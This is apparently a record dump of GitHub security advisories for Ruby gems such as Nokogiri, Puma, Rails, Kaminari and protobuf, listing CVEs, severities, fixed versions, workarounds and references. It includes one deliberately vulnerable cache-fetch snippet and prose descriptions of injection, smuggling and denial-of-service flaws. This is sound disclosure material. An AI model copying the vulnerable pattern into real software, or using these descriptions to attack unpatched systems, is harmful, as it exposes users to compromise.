## Summary Nokogiri v1.13.4 updates the vendored `xerces:xercesImpl` from 2.12.0 to 2.12.2, which addresses [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437). That CVE is scored as CVSS 6.5 "Medium" on the NVD record. Please note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`. ## Mitigation Upgrade to Nokogiri `>= v1.13.4`. ## Impact ### [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437) in xerces-J - **Severity**: Medium - **Type**: [CWE-91](https://cwe.mitre.org/data/definitions/91.html) XML Injection (aka Blind XPath Injection) - **Description**: There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions. - **See also**: https://github.com/advisories/GHSA-h65f-jvqw-m9fj
null
2022-04-11T21:46:11.583393Z
2022-04-11T21:30:00Z
MODERATE
null
{'CWE-91'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-23437', 'https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4', 'https://github.com/advisories/GHSA-h65f-jvqw-m9fj', 'https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xxx9-3xcr-gjj3', 'https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ?utm_medium=email&utm_source=footer', 'https://github.com/sparklemotion/nokogiri'}
null
RubyGems
GHSA-q28m-8xjw-8vr5
Keepalive Connections Causing Denial Of Service in puma
This vulnerability is related to [CVE-2019-16770](https://github.com/puma/puma/security/advisories/GHSA-7xx3-m584-x994). ### Impact The fix for CVE-2019-16770 was incomplete. The original fix only protected existing connections that had already been accepted from having their requests starved by greedy persistent-connections saturating all threads in the same process. However, new connections may still be starved by greedy persistent-connections saturating all threads in all processes in the cluster. A `puma` server which received more concurrent `keep-alive` connections than the server had threads in its threadpool would service only a subset of connections, denying service to the unserved connections. ### Patches This problem has been fixed in `puma` 4.3.8 and 5.3.1. ### Workarounds Setting `queue_requests false` also fixes the issue. This is not advised when using `puma` without a reverse proxy, such as `nginx` or `apache`, because you will open yourself to slow client attacks (e.g. [slowloris](https://en.wikipedia.org/wiki/Slowloris_(computer_security))). The fix is very small. [A git patch is available here](https://gist.github.com/nateberkopec/4b3ea5676c0d70cbb37c82d54be25837) for those using [unsupported versions](https://github.com/puma/puma/security/policy#supported-versions) of Puma. ### For more information If you have any questions or comments about this advisory: * Open an issue in [Puma](https://github.com/puma/puma). * To report problems with this fix or to report another vulnerability, see [our security policy.](https://github.com/puma/puma/security/policy) ### Acknowledgements Thank you to @MSP-Greg, @wjordan and @evanphx for their review on this issue. Thank you to @ioquatix for providing a modified fork of `wrk` which made debugging this issue much easier.
{'CVE-2021-29509'}
2022-03-03T05:14:16.230145Z
2021-05-18T01:27:15Z
HIGH
null
{'CWE-400'}
{'https://gist.github.com/nateberkopec/4b3ea5676c0d70cbb37c82d54be25837', 'https://github.com/puma/puma/security/policy', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29509', 'https://github.com/puma/puma/security/advisories/GHSA-q28m-8xjw-8vr5', 'https://rubygems.org/gems/puma'}
null
RubyGems
GHSA-xgj6-pgrm-x4r2
Moderate severity vulnerability that affects gtk2
Format string vulnerability in the mdiag_initialize function in gtk/src/rbgtkmessagedialog.c in Ruby-GNOME 2 (aka Ruby/Gnome2) 0.16.0, and SVN versions before 20071127, allows context-dependent attackers to execute arbitrary code via format string specifiers in the message parameter.
{'CVE-2007-6183'}
2020-06-16T22:03:18Z
2017-10-24T18:33:38Z
MODERATE
null
{'CWE-134'}
{'http://www.securityfocus.com/archive/1/484240/100/0/threaded', 'https://github.com/advisories/GHSA-xgj6-pgrm-x4r2', 'http://secunia.com/advisories/28022', 'http://www.mandriva.com/security/advisories?name=MDVSA-2008:033', 'http://bugs.gentoo.org/show_bug.cgi?id=200623', 'http://secunia.com/advisories/27975', 'http://em386.blogspot.com/2007/11/your-favorite-better-than-c-scripting.html', 'http://securityreason.com/securityalert/3407', 'http://secunia.com/advisories/27825', 'http://www.securityfocus.com/bid/26616', 'http://www.vupen.com/english/advisories/2007/4022', 'http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=453689', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/38757', 'http://secunia.com/advisories/28060', 'https://www.redhat.com/archives/fedora-package-announce/2007-December/msg00214.html', 'http://osvdb.org/40774', 'http://ruby-gnome2.svn.sourceforge.net/viewvc/ruby-gnome2/ruby-gnome2/trunk/gtk/src/rbgtkmessagedialog.c?view=log', 'https://www.redhat.com/archives/fedora-package-announce/2007-December/msg00251.html', 'https://nvd.nist.gov/vuln/detail/CVE-2007-6183', 'https://bugzilla.redhat.com/show_bug.cgi?id=402871', 'http://www.debian.org/security/2007/dsa-1431', 'http://security.gentoo.org/glsa/glsa-200712-09.xml'}
null
RubyGems
GHSA-p65m-qr5x-rrqq
High severity vulnerability that affects webbynode
The message function in lib/webbynode/notify.rb in the Webbynode gem 1.0.5.3 and earlier for Ruby allows context-dependent attackers to execute arbitrary commands via shell metacharacters in a growlnotify message.
{'CVE-2013-7086'}
2022-03-03T05:13:46.624798Z
2017-10-24T18:33:36Z
HIGH
null
{'CWE-94'}
{'http://seclists.org/oss-sec/2013/q4/497', 'https://github.com/webbynode/webbynode', 'http://seclists.org/oss-sec/2013/q4/493', 'http://archives.neohapsis.com/archives/bugtraq/2013-12/0079.html', 'http://www.securityfocus.com/bid/64289', 'https://github.com/webbynode/webbynode/pull/85', 'https://nvd.nist.gov/vuln/detail/CVE-2013-7086', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/89705', 'http://www.vapid.dhs.org/advisories/webbynode-command-inj.html', 'https://github.com/advisories/GHSA-p65m-qr5x-rrqq', 'http://packetstormsecurity.com/files/124421', 'http://osvdb.org/100920'}
null
RubyGems
GHSA-4wm8-fjv7-j774
Escape sequence injection in RubyGems
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. (There are many ways to cause an error.)
{'CVE-2019-8325'}
2022-03-03T05:13:37.455081Z
2019-06-20T16:08:21Z
HIGH
null
{'CWE-74'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-8325', 'https://hackerone.com/reports/317353', 'https://lists.debian.org/debian-lts-announce/2020/08/msg00027.html', 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html'}
null
RubyGems
GHSA-jp5v-5gx4-jmj9
Ability to forge per-form CSRF tokens in Rails
It is possible to possible to, given a global CSRF token such as the one present in the authenticity_token meta tag, forge a per-form CSRF token for any action for that session. Impact ------ Given the ability to extract the global CSRF token, an attacker would be able to construct a per-form CSRF token for that session. Workarounds ----------- This is a low-severity security issue. As such, no workaround is necessarily until such time as the application can be upgraded.
{'CVE-2020-8166'}
2022-03-03T05:13:39.220110Z
2020-05-26T15:11:13Z
MODERATE
null
{'CWE-352'}
{'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8166.yml', 'https://groups.google.com/forum/#!topic/rubyonrails-security/NOjKiGeXUgw', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8166', 'https://hackerone.com/reports/732415'}
null
RubyGems
GHSA-2p68-f74v-9wc6
Unintended unmarshalling in ActiveSupport
In ActiveSupport, there is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when untrusted user input is written to the cache store using the `raw: true` parameter, re-reading the result from the cache can evaluate the user input as a Marshalled object instead of plain text. Vulnerable code looks like: ``` data = cache.fetch("demo", raw: true) { untrusted_string } ``` Versions Affected: rails < 5.2.5, rails < 6.0.4 Not affected: Applications not using MemCacheStore or RedisCacheStore. Applications that do not use the `raw` option when storing untrusted user input. Fixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1 Impact ------ Unmarshalling of untrusted user input can have impact up to and including RCE. At a minimum, this vulnerability allows an attacker to inject untrusted Ruby objects into a web application. In addition to upgrading to the latest versions of Rails, developers should ensure that whenever they are calling `Rails.cache.fetch` they are using consistent values of the `raw` parameter for both reading and writing, especially in the case of the RedisCacheStore which does not, prior to these changes, detect if data was serialized using the raw option upon deserialization. Workarounds ----------- It is recommended that application developers apply the suggested patch or upgrade to the latest release as soon as possible. If this is not possible, we recommend ensuring that all user-provided strings cached using the `raw` argument should be double-checked to ensure that they conform to the expected format.
{'CVE-2020-8165'}
2022-03-03T05:13:57.734561Z
2020-05-26T14:49:24Z
HIGH
null
{'CWE-502'}
{'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00034.html', 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00031.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8165', 'https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activesupport/CVE-2020-8165.yml', 'https://groups.google.com/g/rubyonrails-security/c/bv6fW4S0Y1c', 'https://hackerone.com/reports/413388', 'https://lists.debian.org/debian-lts-announce/2020/06/msg00022.html', 'https://groups.google.com/forum/#!topic/rubyonrails-security/bv6fW4S0Y1c', 'https://www.debian.org/security/2020/dsa-4766', 'https://weblog.rubyonrails.org/2020/5/18/Rails-5-2-4-3-and-6-0-3-1-have-been-released/'}
null
RubyGems
GHSA-gppp-5xc5-wfpx
Moderate severity vulnerability that affects activerecord
Ruby on Rails 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before 3.2.11 does not properly consider differences in parameter handling between the Active Record component and the JSON implementation, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks or trigger missing WHERE clauses via a crafted request, as demonstrated by certain "[nil]" values, a related issue to CVE-2012-2660 and CVE-2012-2694.
{'CVE-2013-0155'}
2022-03-03T05:14:16.516838Z
2017-10-24T18:33:37Z
MODERATE
null
null
{'https://groups.google.com/group/rubyonrails-security/msg/bc6f13dafe130ee9?dmode=source&output=gplain', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-036-01A', 'http://lists.opensuse.org/opensuse-updates/2013-12/msg00081.html', 'http://support.apple.com/kb/HT5784', 'https://puppet.com/security/cve/cve-2013-0155', 'http://www.debian.org/security/2013/dsa-2609', 'http://lists.opensuse.org/opensuse-updates/2013-12/msg00079.html', 'http://rhn.redhat.com/errata/RHSA-2013-0155.html', 'http://lists.opensuse.org/opensuse-updates/2013-12/msg00082.html', 'http://rhn.redhat.com/errata/RHSA-2013-0154.html', 'http://lists.opensuse.org/opensuse-updates/2014-01/msg00003.html', 'https://github.com/advisories/GHSA-gppp-5xc5-wfpx', 'http://lists.apple.com/archives/security-announce/2013/Jun/msg00000.html', 'https://nvd.nist.gov/vuln/detail/CVE-2013-0155'}
null
RubyGems
GHSA-cvw2-xj8r-mjf7
Activerecord-session_store Timing Attack
The `activerecord-session_store` (aka Active Record Session Store) component through 1.1.3 for Ruby on Rails does not use a constant-time approach when delivering information about whether a guessed session ID is valid. Consequently, remote attackers can leverage timing discrepancies to achieve a correct guess in a relatively short amount of time. This is a related issue to CVE-2019-16782. ## Recommendation This has been fixed in version 2.0.0. All users are advised to update to this version or later.
{'CVE-2019-25025'}
2022-03-03T05:12:44.882098Z
2021-03-09T00:45:31Z
MODERATE
null
{'CWE-208'}
{'https://github.com/rails/activerecord-session_store/releases/tag/v2.0.0', 'https://github.com/rubysec/ruby-advisory-db/blob/master/activerecord-session_store/CVE-2019-25025.yml', 'https://nvd.nist.gov/vuln/detail/CVE-2019-25025', 'https://github.com/rails/activerecord-session_store/pull/151', 'https://github.com/rails/activerecord-session_store/commit/9d4dd113d3010b82daaadf0b0ee6b9fb2afb2160', 'https://rubygems.org/gems/activerecord-session_store'}
null
RubyGems
GHSA-pxqr-8v54-m2hj
Moderate severity vulnerability that affects rails_admin
rails_admin ruby gem <v1.1.1 is vulnerable to cross-site request forgery (CSRF) attacks. Non-GET methods were not validating CSRF tokens and, as a result, an attacker could hypothetically gain access to the application administrative endpoints exposed by the gem.
{'CVE-2016-10522'}
2022-03-03T05:12:51.420754Z
2018-08-08T22:30:35Z
MODERATE
null
{'CWE-352'}
{'https://github.com/sferik/rails_admin/commit/b13e879eb93b661204e9fb5e55f7afa4f397537a', 'https://www.sourceclear.com/registry/security/cross-site-request-forgery-csrf-/ruby/sid-3173', 'https://www.sourceclear.com/blog/Rails_admin-Vulnerability-Disclosure/', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10522', 'https://github.com/advisories/GHSA-pxqr-8v54-m2hj'}
null
RubyGems
GHSA-9wrq-xvmp-xjc8
High severity vulnerability that affects rails.
Unspecified vulnerability in the "dependency resolution mechanism" in Ruby on Rails 1.1.0 through 1.1.5 allows remote attackers to execute arbitrary Ruby code via a URL that is not properly handled in the routing code, which leads to a denial of service (application hang) or "data loss," a different vulnerability than CVE-2006-4111.
{'CVE-2006-4112'}
2022-03-03T05:13:04.544337Z
2017-10-24T18:33:38Z
HIGH
null
null
{'https://github.com/advisories/GHSA-9wrq-xvmp-xjc8', 'http://secunia.com/advisories/21466', 'http://www.securityfocus.com/archive/1/442934/100/0/threaded', 'http://weblog.rubyonrails.org/2006/8/10/rails-1-1-6-backports-and-full-disclosure', 'http://www.novell.com/linux/security/advisories/2006_21_sr.html', 'http://www.kb.cert.org/vuls/id/699540', 'http://secunia.com/advisories/21749', 'http://www.securityfocus.com/bid/19454', 'http://securitytracker.com/id?1016673', 'http://www.gentoo.org/security/en/glsa/glsa-200608-20.xml', 'https://github.com/rails/rails', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/28364', 'https://nvd.nist.gov/vuln/detail/CVE-2006-4112', 'http://secunia.com/advisories/21424'}
null
RubyGems
GHSA-6hrm-jqp3-64cv
Improper Certificate Validation in TweetStream
TweetStream 2.6.1 uses the library eventmachine in an insecure way that does not have TLS hostname validation. This allows an attacker to perform a man-in-the-middle attack.
{'CVE-2020-24393'}
2022-03-03T05:10:05.651014Z
2021-04-13T15:42:36Z
MODERATE
null
{'CWE-295'}
{'https://securitylab.github.com/advisories/GHSL-2020-096-tweetstream-tweetstream', 'https://github.com/tweetstream/tweetstream', 'https://nvd.nist.gov/vuln/detail/CVE-2020-24393'}
null
RubyGems
GHSA-x489-jjwm-52g7
Tinfoil Devise-two-factor does not "burn" a successfully validated one-time password (OTP)
Tinfoil Devise-two-factor before 2.0.0 does not strictly follow section 5.2 of RFC 6238 and does not "burn" a successfully validated one-time password (aka OTP), which allows remote or physically proximate attackers with a target user's login credentials to log in as said user by obtaining the OTP through performing a man-in-the-middle attack between the provider and verifier, or shoulder surfing, and replaying the OTP in the current time-step.
{'CVE-2015-7225'}
2022-04-26T18:32:56.509344Z
2018-08-28T22:34:15Z
MODERATE
null
null
{'https://github.com/advisories/GHSA-x489-jjwm-52g7', 'http://www.securityfocus.com/bid/76789', 'https://nvd.nist.gov/vuln/detail/CVE-2015-7225', 'https://github.com/tinfoil/devise-two-factor', 'http://www.openwall.com/lists/oss-security/2015/09/17/2', 'https://github.com/tinfoil/devise-two-factor/issues/45#issuecomment-139335608', 'http://www.openwall.com/lists/oss-security/2015/06/20/4', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=798466', 'https://github.com/tinfoil/devise-two-factor/blob/master/UPGRADING.md'}
null
RubyGems
GHSA-pf6m-fxpq-fg8v
Nokogiri lacked integer overflow checks
The xsltAddTextString function in transform.c in libxslt 1.1.29, as used in Nokogiri prior to 1.7.2, lacked a check for integer overflow during a size calculation, which allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page.
{'CVE-2017-5029'}
2022-04-26T18:33:05.593001Z
2018-07-31T18:21:29Z
HIGH
null
{'CWE-787'}
{'http://www.securityfocus.com/bid/96767', 'http://www.debian.org/security/2017/dsa-3810', 'https://chromereleases.googleblog.com/2017/03/stable-channel-update-for-desktop.html', 'http://rhn.redhat.com/errata/RHSA-2017-0499.html', 'https://nvd.nist.gov/vuln/detail/CVE-2017-5029', 'https://crbug.com/676623', 'https://github.com/advisories/GHSA-pf6m-fxpq-fg8v', 'http://www.securitytracker.com/id/1038157', 'https://git.gnome.org/browse/libxslt/commit/?id=08ab2774b870de1c7b5a48693df75e8154addae5'}
null
RubyGems
GHSA-gh2w-j7cx-2664
High severity vulnerability that affects activerecord
SQL injection vulnerability in the Active Record component in Ruby on Rails before 3.0.18, 3.1.x before 3.1.9, and 3.2.x before 3.2.10 allows remote attackers to execute arbitrary SQL commands via a crafted request that leverages incorrect behavior of dynamic finders in applications that can use unexpected data types in certain find_by_ method calls.
{'CVE-2012-6496'}
2022-03-03T05:14:09.442479Z
2017-10-24T18:33:37Z
HIGH
null
{'CWE-89'}
{'http://blog.phusion.nl/2013/01/03/rails-sql-injection-vulnerability-hold-your-horses-here-are-the-facts/', 'http://rhn.redhat.com/errata/RHSA-2013-0220.html', 'http://security.gentoo.org/glsa/glsa-201401-22.xml', 'https://groups.google.com/group/rubyonrails-security/msg/23daa048baf28b64?dmode=source&output=gplain', 'http://www.securityfocus.com/bid/57084', 'http://rhn.redhat.com/errata/RHSA-2013-0155.html', 'http://rhn.redhat.com/errata/RHSA-2013-0154.html', 'https://bugzilla.redhat.com/show_bug.cgi?id=889649', 'https://nvd.nist.gov/vuln/detail/CVE-2012-6496', 'https://github.com/advisories/GHSA-gh2w-j7cx-2664', 'http://rhn.redhat.com/errata/RHSA-2013-0544.html'}
null
RubyGems
GHSA-c43v-hrmg-56r4
Moderate severity vulnerability that affects cocaine
The Cocaine gem 0.4.0 through 0.5.2 for Ruby allows context-dependent attackers to execute arbitrary commands via a crafted has object, related to recursive variable interpolation.
{'CVE-2013-4457'}
2022-03-03T05:13:54.562777Z
2017-10-24T18:33:37Z
MODERATE
null
{'CWE-78'}
{'https://github.com/advisories/GHSA-c43v-hrmg-56r4', 'http://secunia.com/advisories/55365', 'http://osvdb.org/98835', 'http://www.openwall.com/lists/oss-security/2013/10/22/10', 'https://github.com/thoughtbot/cocaine/blob/master/NEWS.md', 'https://github.com/thoughtbot/cocaine', 'https://nvd.nist.gov/vuln/detail/CVE-2013-4457'}
null
RubyGems
GHSA-gj4p-3wh3-2rmf
High severity vulnerability that affects yard
lib/yard/core_ext/file.rb in the server in YARD before 0.9.11 does not block relative paths with an initial ../ sequence, which allows attackers to conduct directory traversal attacks and read arbitrary files.
{'CVE-2017-17042'}
2022-03-03T05:13:44.937947Z
2017-12-21T00:47:25Z
HIGH
null
{'CWE-22'}
{'https://github.com/advisories/GHSA-gj4p-3wh3-2rmf', 'https://github.com/lsegal/yard/commit/b0217b3e30dc53d057b1682506333335975e62b4', 'https://nvd.nist.gov/vuln/detail/CVE-2017-17042', 'https://github.com/lsegal/yard'}
null
RubyGems
GHSA-h99w-9q5r-gjq9
HTTP Request Smuggling in puma
When using Puma behind a proxy that does not properly validate that the incoming HTTP request matches the RFC7230 standard, Puma and the frontend proxy may disagree on where a request starts and ends. This would allow requests to be smuggled via the front-end proxy to Puma. The following vulnerabilities are addressed by this advisory: - Lenient parsing of `Transfer-Encoding` headers, when unsupported encodings should be rejected and the final encoding must be `chunked`. - Lenient parsing of malformed `Content-Length` headers and chunk sizes, when only digits and hex digits should be allowed. - Lenient parsing of duplicate `Content-Length` headers, when they should be rejected. - Lenient parsing of the ending of chunked segments, when they should end with `\r\n`. The vulnerability has been fixed in 5.6.4 and 4.3.12. When deploying a proxy in front of Puma, turning on any and all functionality to make sure that the request matches the RFC7230 standard. These proxy servers are known to have "good" behavior re: this standard and upgrading Puma may not be necessary. Users are encouraged to validate for themselves. - Nginx (latest) - Apache (latest) - Haproxy 2.5+ - Caddy (latest) - Traefik (latest)
{'CVE-2022-24790'}
2022-04-12T16:46:52.055525Z
2022-03-30T21:48:50Z
CRITICAL
null
{'CWE-444'}
{'https://portswigger.net/web-security/request-smuggling', 'https://github.com/puma/puma/security/advisories/GHSA-h99w-9q5r-gjq9', 'https://github.com/puma/puma', 'https://github.com/puma/puma/commit/5bb7d202e24dec00a898dca4aa11db391d7787a5', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24790'}
null
RubyGems
GHSA-hrj5-qp7x-rpg6
SQL Injection in marginalia
marginalia < 1.6 is affected by: SQL Injection. The impact is: The impact is a injection of any SQL queries when a user controller argument is added as a component. The component is: Affects users that add a component that is user controller, for instance a parameter or a header. The attack vector is: Hacker inputs a SQL to a vulnerable vector(header, http parameter, etc). The fixed version is: 1.6.
{'CVE-2019-1010191'}
2022-03-03T05:13:46.087178Z
2019-07-26T16:10:15Z
CRITICAL
null
{'CWE-89'}
{'https://github.com/basecamp/marginalia/pull/73/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1010191'}
null
RubyGems
GHSA-r5jw-62xg-j433
Cross-Site Scripting in Kaminari
### Impact In Kaminari before 1.2.1, there is a vulnerability that would allow an attacker to inject arbitrary code into pages with pagination links. This has been fixed in 1.2.1. ### Releases The 1.2.1 gem including the patch has already been released. All past released versions are affected by this vulnerability. ### Workarounds Application developers who can't update the gem can workaround by overriding the `PARAM_KEY_EXCEPT_LIST` constant. ```ruby module Kaminari::Helpers PARAM_KEY_EXCEPT_LIST = [:authenticity_token, :commit, :utf8, :_method, :script_name, :original_script_name].freeze end ``` ### Credits Thanks to Daniel Mircea for finding the issue and sending a patch via GitHub. Also thanks to Aditya Prakash for reporting the vulnerability.
{'CVE-2020-11082'}
2022-03-03T05:13:55.329992Z
2020-05-28T21:10:11Z
MODERATE
null
{'CWE-79'}
{'https://www.debian.org/security/2021/dsa-5005', 'https://github.com/kaminari/kaminari/security/advisories/GHSA-r5jw-62xg-j433', 'https://nvd.nist.gov/vuln/detail/CVE-2020-11082', 'https://github.com/kaminari/kaminari/commit/8dd52a1aed3d2fa2835d836de23fc0d8c4ff5db8', 'https://lists.debian.org/debian-lts-announce/2021/09/msg00011.html', 'https://github.com/github/advisory-review/pull/1020', 'https://github.com/kaminari/kaminari'}
null
RubyGems
GHSA-m63j-wh5w-c252
Critical severity vulnerability that affects actionview
# Denial of Service Vulnerability in Action View Impact ------ Specially crafted accept headers can cause the Action View template location code to consume 100% CPU, causing the server unable to process requests. This impacts all Rails applications that render views. All users running an affected release should either upgrade or use one of the workarounds immediately. Releases -------- The 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, and 4.2.11.1 releases are available at the normal locations. Workarounds ----------- This vulnerability can be mitigated by wrapping `render` calls with `respond_to` blocks. For example, the following example is vulnerable: ``` class UserController < ApplicationController def index render "index" end end ``` But the following code is not vulnerable: ``` class UserController < ApplicationController def index respond_to |format| format.html { render "index" } end end end ``` Implicit rendering is impacted, so this code is vulnerable: ``` class UserController < ApplicationController def index end end ``` But can be changed this this: ``` class UserController < ApplicationController def index respond_to |format| format.html { render "index" } end end end ``` Alternatively to specifying the format, the following monkey patch can be applied in an initializer: ``` $ cat config/initializers/formats_filter.rb # frozen_string_literal: true ActionDispatch::Request.prepend(Module.new do def formats super().select do |format| format.symbol || format.ref == "*/*" end end end) ``` Please note that only the 5.2.x, 5.1.x, 5.0.x, and 4.2.x series are supported at present. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases. Also note that the patches for this vulnerability are the same as CVE-2019-5418. Credits ------- Thanks to John Hawthorn <john@hawthorn.email> of GitHub
{'CVE-2019-5419'}
2022-03-03T05:14:20.989875Z
2019-03-13T17:25:55Z
CRITICAL
null
{'CWE-400'}
{'https://github.com/advisories/GHSA-m63j-wh5w-c252', 'http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00001.html', 'https://access.redhat.com/errata/RHSA-2019:1289', 'http://www.openwall.com/lists/oss-security/2019/03/22/1', 'https://access.redhat.com/errata/RHSA-2019:1147', 'https://access.redhat.com/errata/RHSA-2019:1149', 'https://groups.google.com/forum/#!topic/rubyonrails-security/GN7w9fFAQeI', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y43636TH4D6T46IC6N2RQVJTRFJAAYGA/', 'https://lists.debian.org/debian-lts-announce/2019/03/msg00042.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-5419', 'http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html', 'https://access.redhat.com/errata/RHSA-2019:0796', 'http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00025.html', 'https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/'}
null
RubyGems
GHSA-9p3v-wf2w-v29c
Moderate severity vulnerability that affects rails
Cross-site scripting (XSS) vulnerability in the strip_tags function in Ruby on Rails before 2.2.s, and 2.3.x before 2.3.5, allows remote attackers to inject arbitrary web script or HTML via vectors involving non-printing ASCII characters, related to HTML::Tokenizer and actionpack/lib/action_controller/vendor/html-scanner/html/node.rb.
{'CVE-2009-4214'}
2022-03-03T05:12:56.447107Z
2017-10-24T18:33:38Z
MODERATE
null
{'CWE-79'}
{'https://github.com/advisories/GHSA-9p3v-wf2w-v29c', 'http://support.apple.com/kb/HT4077', 'http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html', 'http://www.openwall.com/lists/oss-security/2009/12/08/3', 'http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html', 'http://secunia.com/advisories/37446', 'http://www.securityfocus.com/bid/37142', 'http://github.com/rails/rails/commit/bfe032858077bb2946abe25e95e485ba6da86bd5', 'http://groups.google.com/group/rubyonrails-security/browse_thread/thread/4d4f71f2aef4c0ab?pli=1', 'http://www.securitytracker.com/id?1023245', 'http://www.debian.org/security/2011/dsa-2260', 'http://www.vupen.com/english/advisories/2009/3352', 'http://www.debian.org/security/2011/dsa-2301', 'https://nvd.nist.gov/vuln/detail/CVE-2009-4214', 'http://www.openwall.com/lists/oss-security/2009/11/27/2', 'http://github.com/rails/rails', 'http://weblog.rubyonrails.org/2009/11/30/ruby-on-rails-2-3-5-released', 'http://secunia.com/advisories/38915'}
null
RubyGems
GHSA-wrvw-hg22-4m67
A potential Denial of Service issue in protobuf-java
## Summary A potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data. Reporter: [OSS-Fuzz](https://github.com/google/oss-fuzz) Affected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. Protobuf "javalite" users (typically Android) are not affected. ## Severity [CVE-2021-22569](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22569) **High** - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses. ## Proof of Concept For reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness. ## Remediation and Mitigation Please update to the latest available versions of the following packages: - protobuf-java (3.16.1, 3.18.2, 3.19.2) - protobuf-kotlin (3.18.2, 3.19.2) - google-protobuf [JRuby gem only] (3.19.2)
{'CVE-2021-22569'}
2022-04-22T15:47:25.351848Z
2022-01-07T22:31:44Z
HIGH
null
{'CWE-696'}
{'http://www.openwall.com/lists/oss-security/2022/01/12/7', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'http://www.openwall.com/lists/oss-security/2022/01/12/4', 'https://github.com/protocolbuffers/protobuf', 'https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=39330', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22569', 'https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-wrvw-hg22-4m67', 'https://cloud.google.com/support/bulletins#gcp-2022-001'}
null